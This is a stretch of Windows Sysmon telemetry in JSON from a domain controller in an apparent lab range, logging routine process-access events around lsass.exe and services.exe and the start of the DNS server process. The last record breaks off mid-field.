{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1220,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.869\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.869","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1221,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.869\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.869","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1222,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.869\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.869","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1223,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.870\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.870","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1224,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.872\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00106FB80200}\r\nTargetProcessId: 2752\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.872","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00106FB80200}","TargetProcessId":"2752","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1225,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.872\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00106FB80200}\r\nTargetProcessId: 2752\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.872","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00106FB80200}","TargetProcessId":"2752","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1226,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.841\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001014BB0200}\r\nProcessId: 2688\r\nImage: C:\\Windows\\System32\\dns.exe\r\nFileVersion: 10.0.14393.3808 (rs1_release.200707-2105)\r\nDescription: Domain Name System (DNS) Server\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: dns.exe\r\nCommandLine: C:\\Windows\\system32\\dns.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=D12C4522E932461612C72B4EB7A4B3A1,SHA256=BC06AE025E1CDEF4304F0D7983A80D029B6CCBF5761EAB490847100FD161D6FA,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.841","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001014BB0200}","Image":"C:\\Windows\\System32\\dns.exe","FileVersion":"10.0.14393.3808 (rs1_release.200707-2105)","Description":"Domain Name System (DNS) Server","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"dns.exe","CommandLine":"C:\\Windows\\system32\\dns.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=D12C4522E932461612C72B4EB7A4B3A1,SHA256=BC06AE025E1CDEF4304F0D7983A80D029B6CCBF5761EAB490847100FD161D6FA,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1227,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.872\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001014BB0200}\r\nTargetProcessId: 2688\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.872","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001014BB0200}","TargetProcessId":"2688","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1228,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.872\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001014BB0200}\r\nTargetProcessId: 2688\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 